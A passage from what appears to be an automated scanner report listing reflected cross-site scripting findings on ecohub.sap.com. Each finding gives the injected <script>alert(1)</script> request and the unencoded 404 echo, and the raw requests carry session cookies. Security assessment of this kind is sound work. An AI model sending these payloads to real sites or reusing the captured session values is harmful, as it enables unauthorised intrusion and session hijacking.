Cookie: session=b72078a3-ae4c-4516-ad61-f5a89d864bda; CountryRedirectFlag=1; SAP.SITE.COOKIE=cmpgn.code=CRM-GM09-SMP-SAPCOM&cmpn=CRM-GM09-SMP-SAPCOM; client=50271dcd-9baa-4ef3-893c-9fb47c6b6fd7; SAP.TTC=1318688493; CodeTrackingCookie=ExternalReferrerURL=http%3a%2f%2fwww.sdn.sap.com%2firj%2fscn%2fweblogs%3fblog%3d%2fweblogs%2ftopic%2f27; SAP_SCORING_COOKIE=SOLUTION=BARB003001,9|SOLUTION=BARB003001,9|; mbox=session#1318688512533-813903#1318690554|check#true#1318688754; s_pers=%20s_ttc%3D1318688493%7C1350224686878%3B%20c13%3Dscn%253Aglo%253Ablog%7C1318690493228%3B%20pe%3Dno%2520value%7C1318690493231%3B%20c3%3Dscn%253Ablog%253Acategory%253Asap%2520teched%7C1318690493233%3B%20s_nr%3D1318688693239-New%7C1321280693239%3B%20s_sapvisid%3D50271dcd9baa4ef3893c9fb47c6b6fd7%7C1448292293242%3B%20s_visit%3D1%7C1318690493243%3B%20gpv_p47%3Dno%2520value%7C1318690493245%3B; s_sess=%20s_cc%3Dtrue%3B%20v18%3D2%3B%20s_sq%3D%3B; VisitID=QUMxMDU0NkUtMTMzMDdGODYwQzItOEQwRjc1QjM2REUyM0YwMg==; Unique=QUMxMDU0NkUtMTMzMDdGODYwQzItOEJFMzZBQTBCRjZCQUUxMw==; ; SDNSTATE=1834225836.14340.0000; rack.session=BAh7BzoLdXNlcklkIgA6EGRpc3BsYXlOYW1lIgA%3D%0A--e9bcbd9b38efcc777ce9632a16fe98ce5215ed13

Response

HTTP/1.1 404 Not Found
Server: SAP LJS 1.0.0
X-Cascade: pass
Cache-Control: max-age=31536000, public
Expires: Wed, 10 Oct 2012 08:40:08 GMT
SDN_VISIT: QUMxMDU0NkUtMTMzMDdGODYwQzItOEQwRjc1QjM2REUyM0YwMg==
SDN_GUID: QUMxMDU0NkUtMTMzMDdGODYwQzItOEJFMzZBQTBCRjZCQUUxMw==
Content-Type: text/plain
Content-Length: 72
Date: Sat, 15 Oct 2011 14:25:32 GMT
Connection: close

File not found: /img/empty.giff16e8<script>alert(1)</script>8de76daedec

3.16. http://ecohub.sap.com/js/ecohub.js [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ecohub.sap.com
Path:   /js/ecohub.js

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 78724<script>alert(1)</script>6627191e19f was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /js78724<script>alert(1)</script>6627191e19f/ecohub.js?1318315094 HTTP/1.1
Host: ecohub.sap.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.202 Safari/535.1
Accept: */*
Referer: http://ecohub.sap.com/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: session=b72078a3-ae4c-4516-ad61-f5a89d864bda; CountryRedirectFlag=1; SAP.SITE.COOKIE=cmpgn.code=CRM-GM09-SMP-SAPCOM&cmpn=CRM-GM09-SMP-SAPCOM; client=50271dcd-9baa-4ef3-893c-9fb47c6b6fd7; SAP.TTC=1318688493; CodeTrackingCookie=ExternalReferrerURL=http%3a%2f%2fwww.sdn.sap.com%2firj%2fscn%2fweblogs%3fblog%3d%2fweblogs%2ftopic%2f27; SAP_SCORING_COOKIE=SOLUTION=BARB003001,9|SOLUTION=BARB003001,9|; mbox=session#1318688512533-813903#1318690554|check#true#1318688754; s_pers=%20s_ttc%3D1318688493%7C1350224686878%3B%20c13%3Dscn%253Aglo%253Ablog%7C1318690493228%3B%20pe%3Dno%2520value%7C1318690493231%3B%20c3%3Dscn%253Ablog%253Acategory%253Asap%2520teched%7C1318690493233%3B%20s_nr%3D1318688693239-New%7C1321280693239%3B%20s_sapvisid%3D50271dcd9baa4ef3893c9fb47c6b6fd7%7C1448292293242%3B%20s_visit%3D1%7C1318690493243%3B%20gpv_p47%3Dno%2520value%7C1318690493245%3B; s_sess=%20s_cc%3Dtrue%3B%20v18%3D2%3B%20s_sq%3D%3B; rack.session=BAh7BzoLdXNlcklkIgA6EGRpc3BsYXlOYW1lIgA%3D%0A--e9bcbd9b38efcc777ce9632a16fe98ce5215ed13; VisitID=QUMxMDU0NkUtMTMzMDdGODYwQzItOEQwRjc1QjM2REUyM0YwMg==; Unique=QUMxMDU0NkUtMTMzMDdGODYwQzItOEJFMzZBQTBCRjZCQUUxMw==; ; SDNSTATE=1834225836.14340.0000

Response

HTTP/1.1 404 Not Found
Server: SAP LJS 1.0.0
X-Cascade: pass
SDN_VISIT: QUMxMDU0NkUtMTMzMDdGODYwQzItOEQwRjc1QjM2REUyM0YwMg==
SDN_GUID: QUMxMDU0NkUtMTMzMDdGODYwQzItOEJFMzZBQTBCRjZCQUUxMw==
Content-Type: text/plain
Content-Length: 71
Cache-Control: public, max-age=86400
Expires: Sun, 16 Oct 2011 14:25:18 GMT
Date: Sat, 15 Oct 2011 14:25:18 GMT
Connection: close

File not found: /js78724<script>alert(1)</script>6627191e19f/ecohub.js

3.17. http://ecohub.sap.com/js/ecohub.js [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ecohub.sap.com
Path:   /js/ecohub.js

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 9726b<script>alert(1)</script>f1d958d7d40 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /js/ecohub.js9726b<script>alert(1)</script>f1d958d7d40?1318315094 HTTP/1.1
Host: ecohub.sap.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.202 Safari/535.1
Accept: */*
Referer: http://ecohub.sap.com/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: session=b72078a3-ae4c-4516-ad61-f5a89d864bda; CountryRedirectFlag=1; SAP.SITE.COOKIE=cmpgn.code=CRM-GM09-SMP-SAPCOM&cmpn=CRM-GM09-SMP-SAPCOM; client=50271dcd-9baa-4ef3-893c-9fb47c6b6fd7; SAP.TTC=1318688493; CodeTrackingCookie=ExternalReferrerURL=http%3a%2f%2fwww.sdn.sap.com%2firj%2fscn%2fweblogs%3fblog%3d%2fweblogs%2ftopic%2f27; SAP_SCORING_COOKIE=SOLUTION=BARB003001,9|SOLUTION=BARB003001,9|; mbox=session#1318688512533-813903#1318690554|check#true#1318688754; s_pers=%20s_ttc%3D1318688493%7C1350224686878%3B%20c13%3Dscn%253Aglo%253Ablog%7C1318690493228%3B%20pe%3Dno%2520value%7C1318690493231%3B%20c3%3Dscn%253Ablog%253Acategory%253Asap%2520teched%7C1318690493233%3B%20s_nr%3D1318688693239-New%7C1321280693239%3B%20s_sapvisid%3D50271dcd9baa4ef3893c9fb47c6b6fd7%7C1448292293242%3B%20s_visit%3D1%7C1318690493243%3B%20gpv_p47%3Dno%2520value%7C1318690493245%3B; s_sess=%20s_cc%3Dtrue%3B%20v18%3D2%3B%20s_sq%3D%3B; rack.session=BAh7BzoLdXNlcklkIgA6EGRpc3BsYXlOYW1lIgA%3D%0A--e9bcbd9b38efcc777ce9632a16fe98ce5215ed13; VisitID=QUMxMDU0NkUtMTMzMDdGODYwQzItOEQwRjc1QjM2REUyM0YwMg==; Unique=QUMxMDU0NkUtMTMzMDdGODYwQzItOEJFMzZBQTBCRjZCQUUxMw==; ; SDNSTATE=1834225836.14340.0000

Response

HTTP/1.1 404 Not Found
Server: SAP LJS 1.0.0
X-Cascade: pass
Cache-Control: max-age=31536000, public
Expires: Wed, 10 Oct 2012 08:40:08 GMT
SDN_VISIT: QUMxMDU0NkUtMTMzMDdGODYwQzItOEQwRjc1QjM2REUyM0YwMg==
SDN_GUID: QUMxMDU0NkUtMTMzMDdGODYwQzItOEJFMzZBQTBCRjZCQUUxMw==
Content-Type: text/plain
Content-Length: 71
Date: Sat, 15 Oct 2011 14:25:25 GMT
Connection: close

File not found: /js/ecohub.js9726b<script>alert(1)</script>f1d958d7d40

3.18. http://ecohub.sap.com/js/jquery-1.5.2.min.js [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ecohub.sap.com
Path:   /js/jquery-1.5.2.min.js

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload c11ea<script>alert(1)</script>3d8d2c650a5 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /jsc11ea<script>alert(1)</script>3d8d2c650a5/jquery-1.5.2.min.js?1318315094 HTTP/1.1
Host: ecohub.sap.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.202 Safari/535.1
Accept: */*
Referer: http://ecohub.sap.com/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: session=b72078a3-ae4c-4516-ad61-f5a89d864bda; CountryRedirectFlag=1; SAP.SITE.COOKIE=cmpgn.code=CRM-GM09-SMP-SAPCOM&cmpn=CRM-GM09-SMP-SAPCOM; client=50271dcd-9baa-4ef3-893c-9fb47c6b6fd7; SAP.TTC=1318688493; CodeTrackingCookie=ExternalReferrerURL=http%3a%2f%2fwww.sdn.sap.com%2firj%2fscn%2fweblogs%3fblog%3d%2fweblogs%2ftopic%2f27; SAP_SCORING_COOKIE=SOLUTION=BARB003001,9|SOLUTION=BARB003001,9|; mbox=session#1318688512533-813903#1318690554|check#true#1318688754; s_pers=%20s_ttc%3D1318688493%7C1350224686878%3B%20c13%3Dscn%253Aglo%253Ablog%7C1318690493228%3B%20pe%3Dno%2520value%7C1318690493231%3B%20c3%3Dscn%253Ablog%253Acategory%253Asap%2520teched%7C1318690493233%3B%20s_nr%3D1318688693239-New%7C1321280693239%3B%20s_sapvisid%3D50271dcd9baa4ef3893c9fb47c6b6fd7%7C1448292293242%3B%20s_visit%3D1%7C1318690493243%3B%20gpv_p47%3Dno%2520value%7C1318690493245%3B; s_sess=%20s_cc%3Dtrue%3B%20v18%3D2%3B%20s_sq%3D%3B; rack.session=BAh7BzoLdXNlcklkIgA6EGRpc3BsYXlOYW1lIgA%3D%0A--e9bcbd9b38efcc777ce9632a16fe98ce5215ed13; VisitID=QUMxMDU0NkUtMTMzMDdGODYwQzItOEQwRjc1QjM2REUyM0YwMg==; Unique=QUMxMDU0NkUtMTMzMDdGODYwQzItOEJFMzZBQTBCRjZCQUUxMw==; ; SDNSTATE=1834225836.14340.0000

Response

HTTP/1.1 404 Not Found
Server: SAP LJS 1.0.0
X-Cascade: pass
SDN_VISIT: QUMxMDU0NkUtMTMzMDdGODYwQzItOEQwRjc1QjM2REUyM0YwMg==
SDN_GUID: QUMxMDU0NkUtMTMzMDdGODYwQzItOEJFMzZBQTBCRjZCQUUxMw==
Content-Type: text/plain
Content-Length: 81
Cache-Control: public, max-age=86362
Expires: Sun, 16 Oct 2011 14:24:44 GMT
Date: Sat, 15 Oct 2011 14:25:22 GMT
Connection: close

File not found: /jsc11ea<script>alert(1)</script>3d8d2c650a5/jquery-1.5.2.min.js

3.19. http://ecohub.sap.com/js/jquery-1.5.2.min.js [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ecohub.sap.com
Path:   /js/jquery-1.5.2.min.js

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload d00b2<script>alert(1)</script>2a60a99c87 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /js/jquery-1.5.2.min.jsd00b2<script>alert(1)</script>2a60a99c87?1318315094 HTTP/1.1
Host: ecohub.sap.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.202 Safari/535.1
Accept: */*
Referer: http://ecohub.sap.com/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: session=b72078a3-ae4c-4516-ad61-f5a89d864bda; CountryRedirectFlag=1; SAP.SITE.COOKIE=cmpgn.code=CRM-GM09-SMP-SAPCOM&cmpn=CRM-GM09-SMP-SAPCOM; client=50271dcd-9baa-4ef3-893c-9fb47c6b6fd7; SAP.TTC=1318688493; CodeTrackingCookie=ExternalReferrerURL=http%3a%2f%2fwww.sdn.sap.com%2firj%2fscn%2fweblogs%3fblog%3d%2fweblogs%2ftopic%2f27; SAP_SCORING_COOKIE=SOLUTION=BARB003001,9|SOLUTION=BARB003001,9|; mbox=session#1318688512533-813903#1318690554|check#true#1318688754; s_pers=%20s_ttc%3D1318688493%7C1350224686878%3B%20c13%3Dscn%253Aglo%253Ablog%7C1318690493228%3B%20pe%3Dno%2520value%7C1318690493231%3B%20c3%3Dscn%253Ablog%253Acategory%253Asap%2520teched%7C1318690493233%3B%20s_nr%3D1318688693239-New%7C1321280693239%3B%20s_sapvisid%3D50271dcd9baa4ef3893c9fb47c6b6fd7%7C1448292293242%3B%20s_visit%3D1%7C1318690493243%3B%20gpv_p47%3Dno%2520value%7C1318690493245%3B; s_sess=%20s_cc%3Dtrue%3B%20v18%3D2%3B%20s_sq%3D%3B; rack.session=BAh7BzoLdXNlcklkIgA6EGRpc3BsYXlOYW1lIgA%3D%0A--e9bcbd9b38efcc777ce9632a16fe98ce5215ed13; VisitID=QUMxMDU0NkUtMTMzMDdGODYwQzItOEQwRjc1QjM2REUyM0YwMg==; Unique=QUMxMDU0NkUtMTMzMDdGODYwQzItOEJFMzZBQTBCRjZCQUUxMw==; ; SDNSTATE=1834225836.14340.0000

Response

HTTP/1.1 404 Not Found
Server: SAP LJS 1.0.0
X-Cascade: pass
Cache-Control: max-age=31536000, public
Expires: Wed, 10 Oct 2012 08:40:08 GMT
SDN_VISIT: QUMxMDU0NkUtMTMzMDdGODYwQzItOEQwRjc1QjM2REUyM0YwMg==
SDN_GUID: QUMxMDU0NkUtMTMzMDdGODYwQzItOEJFMzZBQTBCRjZCQUUxMw==
Content-Type: text/plain
Content-Length: 80
Date: Sat, 15 Oct 2011 14:25:29 GMT
Connection: close

File not found: /js/jquery-1.5.2.min.jsd00b2<script>alert(1)</script>2a60a99c87

3.20. http://ecohub.sap.com/stylesheets/style.css [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ecohub.sap.com
Path:   /stylesheets/style.css

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 813b4<script>alert(1)</script>b80a639f654 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /stylesheets813b4<script>alert(1)</script>b80a639f654/style.css?1318315094 HTTP/1.1
Host: ecohub.sap.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.202 Safari/535.1
Accept: text/css,*/*;q=0.1
Referer: http://ecohub.sap.com/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: session=b72078a3-ae4c-4516-ad61-f5a89d864bda; CountryRedirectFlag=1; SAP.SITE.COOKIE=cmpgn.code=CRM-GM09-SMP-SAPCOM&cmpn=CRM-GM09-SMP-SAPCOM; client=50271dcd-9baa-4ef3-893c-9fb47c6b6fd7; SAP.TTC=1318688493; CodeTrackingCookie=ExternalReferrerURL=http%3a%2f%2fwww.sdn.sap.com%2firj%2fscn%2fweblogs%3fblog%3d%2fweblogs%2ftopic%2f27; SAP_SCORING_COOKIE=SOLUTION=BARB003001,9|SOLUTION=BARB003001,9|; mbox=session#1318688512533-813903#1318690554|check#true#1318688754; s_pers=%20s_ttc%3D1318688493%7C1350224686878%3B%20c13%3Dscn%253Aglo%253Ablog%7C1318690493228%3B%20pe%3Dno%2520value%7C1318690493231%3B%20c3%3Dscn%253Ablog%253Acategory%253Asap%2520teched%7C1318690493233%3B%20s_nr%3D1318688693239-New%7C1321280693239%3B%20s_sapvisid%3D50271dcd9baa4ef3893c9fb47c6b6fd7%7C1448292293242%3B%20s_visit%3D1%7C1318690493243%3B%20gpv_p47%3Dno%2520value%7C1318690493245%3B; s_sess=%20s_cc%3Dtrue%3B%20v18%3D2%3B%20s_sq%3D%3B; rack.session=BAh7BzoLdXNlcklkIgA6EGRpc3BsYXlOYW1lIgA%3D%0A--e9bcbd9b38efcc777ce9632a16fe98ce5215ed13; VisitID=QUMxMDU0NkUtMTMzMDdGODYwQzItOEQwRjc1QjM2REUyM0YwMg==; Unique=QUMxMDU0NkUtMTMzMDdGODYwQzItOEJFMzZBQTBCRjZCQUUxMw==; ; SDNSTATE=1834225836.14340.0000

Response

HTTP/1.1 404 Not Found
Server: SAP LJS 1.0.0
X-Cascade: pass
SDN_VISIT: QUMxMDU0NkUtMTMzMDdGODYwQzItOEQwRjc1QjM2REUyM0YwMg==
SDN_GUID: QUMxMDU0NkUtMTMzMDdGODYwQzItOEJFMzZBQTBCRjZCQUUxMw==
Content-Type: text/plain
Content-Length: 80
Cache-Control: public, max-age=86400
Expires: Sun, 16 Oct 2011 14:25:22 GMT
Date: Sat, 15 Oct 2011 14:25:22 GMT
Connection: close

File not found: /stylesheets813b4<script>alert(1)</script>b80a639f654/style.css

3.21. http://ecohub.sap.com/stylesheets/style.css [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ecohub.sap.com
Path:   /stylesheets/style.css

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 13b92<script>alert(1)</script>2192398d55f was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /stylesheets/style.css13b92<script>alert(1)</script>2192398d55f?1318315094 HTTP/1.1
Host: ecohub.sap.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.202 Safari/535.1
Accept: text/css,*/*;q=0.1
Referer: http://ecohub.sap.com/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: session=b72078a3-ae4c-4516-ad61-f5a89d864bda; CountryRedirectFlag=1; SAP.SITE.COOKIE=cmpgn.code=CRM-GM09-SMP-SAPCOM&cmpn=CRM-GM09-SMP-SAPCOM; client=50271dcd-9baa-4ef3-893c-9fb47c6b6fd7; SAP.TTC=1318688493; CodeTrackingCookie=ExternalReferrerURL=http%3a%2f%2fwww.sdn.sap.com%2firj%2fscn%2fweblogs%3fblog%3d%2fweblogs%2ftopic%2f27; SAP_SCORING_COOKIE=SOLUTION=BARB003001,9|SOLUTION=BARB003001,9|; mbox=session#1318688512533-813903#1318690554|check#true#1318688754; s_pers=%20s_ttc%3D1318688493%7C1350224686878%3B%20c13%3Dscn%253Aglo%253Ablog%7C1318690493228%3B%20pe%3Dno%2520value%7C1318690493231%3B%20c3%3Dscn%253Ablog%253Acategory%253Asap%2520teched%7C1318690493233%3B%20s_nr%3D1318688693239-New%7C1321280693239%3B%20s_sapvisid%3D50271dcd9baa4ef3893c9fb47c6b6fd7%7C1448292293242%3B%20s_visit%3D1%7C1318690493243%3B%20gpv_p47%3Dno%2520value%7C1318690493245%3B; s_sess=%20s_cc%3Dtrue%3B%20v18%3D2%3B%20s_sq%3D%3B; rack.session=BAh7BzoLdXNlcklkIgA6EGRpc3BsYXlOYW1lIgA%3D%0A--e9bcbd9b38efcc777ce9632a16fe98ce5215ed13; VisitID=QUMxMDU0NkUtMTMzMDdGODYwQzItOEQwRjc1QjM2REUyM0YwMg==; Unique=QUMxMDU0NkUtMTMzMDdGODYwQzItOEJFMzZBQTBCRjZCQUUxMw==; ; SDNSTATE=1834225836.14340.0000

Response

HTTP/1.1 404 Not Found
Server: SAP LJS 1.0.0
X-Cascade: pass
Cache-Control: max-age=31536000, public
Expires: Wed, 10 Oct 2012 08:40:08 GMT
SDN_VISIT: QUMxMDU0NkUtMTMzMDdGODYwQzItOEQwRjc1QjM2REUyM0YwMg==
SDN_GUID: QUMxMDU0NkUtMTMzMDdGODYwQzItOEJFMzZBQTBCRjZCQUUxMw==
Content-Type: text/plain
Content-Length: 80
Date: Sat, 15 Oct 2011 14:25:29 GMT
Connection: close

File not found: /stylesheets/style.css13b92<script>alert(1)</script>2192398d55f

3.22. http://ecohub.sap.com/stylesheets813b4%3Cscript%3Ealert(1)%3C/script%3Eb80a639f654/style.css [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://ecohub.sap.com
Path:   /stylesheets813b4%3Cscript%3Ealert(1)%3C/script%3Eb80a639f654/style.css

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript expression which is not encapsulated in any quotation marks. The payload a1b69(a)5c9dcb45dbc was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject JavaScript commands into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /stylesheets813b4%3Cscript%3Ealert(1)%3Ca1b69(a)5c9dcb45dbc/script%3Eb80a639f654/style.css?1318315094 HTTP/1.1
Host: ecohub.sap.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.202 Safari/535.1
Accept: */*
Referer: http://ecohub.sap.com/stylesheets813b4%3Cscript%3Ealert(1)%3C/script%3Eb80a639f654/style.css?1318315094
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: _mkto_trk=id:852-NRZ-712&token:_mch-sap.com-1318688701033-84396; s_pers=%20s_ttc%3D1318688493%7C1350224686878%3B%20c13%3Dscn%253Aglo%253Ascn%253Aadvancedsearch%7C1318691731633%3B%20pe%3Dno%2520value%7C1318691731640%3B%20c3%3Dno%2520value%7C1318691731645%3B%20s_nr%3D1318689931653-New%7C1321281931653%3B%20s_sapvisid%3D50271dcd9baa4ef3893c9fb47c6b6fd7%7C1448293531656%3B%20s_visit%3D1%7C1318691731658%3B%20gpv_p47%3Dno%2520value%7C1318691731661%3B; session=144fe053-5592-4145-8a61-c484bd4d3e8b; CMPFIELDCRM-US11-XEC-CS11TRIAL-QUERYSTRINGFIELD=URL_ID=Q311_cs2011_freetrial_estore; CMPFIELDCRM-US11-XEC-CS11TRIAL-URL=LANDING PAGE=http%3a%2f%2fwww.sap.com%2fcampaign%2f2011_CURR_SAP_Crystal_Reports_Server_2011%2findex.epx%3fURL_ID%3dQ311_cs2011_freetrial_estore%26kNtBzmUK9zU%3d1; CMPFIELDCRM-US11-XEC-CS11TRIAL-HIDDENFIELD=OFT-EMEA=False&OFT-LatAm=False&OFT-APJ=False&InquiryType=Campaign&InquiryLevel=Premium&Segment=CROSS; client=50271dcd-9baa-4ef3-893c-9fb47c6b6fd7; SAP.TTC=1318688493; CodeTrackingCookie=ExternalReferrerURL=http%3a%2f%2fwww.sapvirtualevents.com%2fteched%2fdefault.aspx%3f433fe%27%3balert(document.location)%2f%2ffea0f539288; SAP_SCORING_COOKIE=SOLUTION=BARB003001,9|SOLUTION=BARB003001,9|

Response

HTTP/1.1 404 Not Found
Server: SAP LJS 1.0.0
X-Cascade: pass
SDN_VISIT: QUMxMDU0NkUtMTMzMDdGODYwQzItOEQwRjc1QjM2REUyM0YwMg==
SDN_GUID: QUMxMDU0NkUtMTMzMDdGODYwQzItOEJFMzZBQTBCRjZCQUUxMw==
Content-Type: text/plain
Content-Length: 99
Cache-Control: public, max-age=86356
Expires: Sun, 16 Oct 2011 15:28:23 GMT
Date: Sat, 15 Oct 2011 15:29:07 GMT
Connection: close

File not found: /stylesheets813b4<script>alert(1)<a1b69(a)5c9dcb45dbc/script>b80a639f654/style.css

3.23. http://ecohub.sap.com/stylesheets813b4%3Cscript%3Ealert(1)%3C/script%3Eb80a639f654/style.css [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://ecohub.sap.com
Path:   /stylesheets813b4%3Cscript%3Ealert(1)%3C/script%3Eb80a639f654/style.css

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript expression which is not encapsulated in any quotation marks. The payload 97de3(a)c7cf365f0d3 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject JavaScript commands into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /stylesheets813b4%3Cscript%3Ealert(1)%3C/97de3(a)c7cf365f0d3/style.css?1318315094 HTTP/1.1
Host: ecohub.sap.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.202 Safari/535.1
Accept: */*
Referer: http://ecohub.sap.com/stylesheets813b4%3Cscript%3Ealert(1)%3C/script%3Eb80a639f654/style.css?1318315094
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: _mkto_trk=id:852-NRZ-712&token:_mch-sap.com-1318688701033-84396; s_pers=%20s_ttc%3D1318688493%7C1350224686878%3B%20c13%3Dscn%253Aglo%253Ascn%253Aadvancedsearch%7C1318691731633%3B%20pe%3Dno%2520value%7C1318691731640%3B%20c3%3Dno%2520value%7C1318691731645%3B%20s_nr%3D1318689931653-New%7C1321281931653%3B%20s_sapvisid%3D50271dcd9baa4ef3893c9fb47c6b6fd7%7C1448293531656%3B%20s_visit%3D1%7C1318691731658%3B%20gpv_p47%3Dno%2520value%7C1318691731661%3B; session=144fe053-5592-4145-8a61-c484bd4d3e8b; CMPFIELDCRM-US11-XEC-CS11TRIAL-QUERYSTRINGFIELD=URL_ID=Q311_cs2011_freetrial_estore; CMPFIELDCRM-US11-XEC-CS11TRIAL-URL=LANDING PAGE=http%3a%2f%2fwww.sap.com%2fcampaign%2f2011_CURR_SAP_Crystal_Reports_Server_2011%2findex.epx%3fURL_ID%3dQ311_cs2011_freetrial_estore%26kNtBzmUK9zU%3d1; CMPFIELDCRM-US11-XEC-CS11TRIAL-HIDDENFIELD=OFT-EMEA=False&OFT-LatAm=False&OFT-APJ=False&InquiryType=Campaign&InquiryLevel=Premium&Segment=CROSS; client=50271dcd-9baa-4ef3-893c-9fb47c6b6fd7; SAP.TTC=1318688493; CodeTrackingCookie=ExternalReferrerURL=http%3a%2f%2fwww.sapvirtualevents.com%2fteched%2fdefault.aspx%3f433fe%27%3balert(document.location)%2f%2ffea0f539288; SAP_SCORING_COOKIE=SOLUTION=BARB003001,9|SOLUTION=BARB003001,9|

Response

HTTP/1.1 404 Not Found
Server: SAP LJS 1.0.0
X-Cascade: pass
SDN_VISIT: QUMxMDU0NkUtMTMzMDdGODYwQzItOEQwRjc1QjM2REUyM0YwMg==
SDN_GUID: QUMxMDU0NkUtMTMzMDdGODYwQzItOEJFMzZBQTBCRjZCQUUxMw==
Content-Type: text/plain
Content-Length: 81
Cache-Control: public, max-age=86383
Expires: Sun, 16 Oct 2011 15:28:53 GMT
Date: Sat, 15 Oct 2011 15:29:10 GMT
Connection: close

File not found: /stylesheets813b4<script>alert(1)</97de3(a)c7cf365f0d3/style.css

3.24. http://ecohub.sap.com/stylesheets813b4%3Cscript%3Ealert(1)%3C/script%3Eb80a639f654/style.css [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ecohub.sap.com
Path:   /stylesheets813b4%3Cscript%3Ealert(1)%3C/script%3Eb80a639f654/style.css

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 3df4c<script>alert(1)</script>54d7771a769 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /stylesheets813b4%3Cscript%3Ealert(1)%3C/script%3Eb80a639f6543df4c<script>alert(1)</script>54d7771a769/style.css?1318315094 HTTP/1.1
Host: ecohub.sap.com
Proxy-Connection: keep-alive
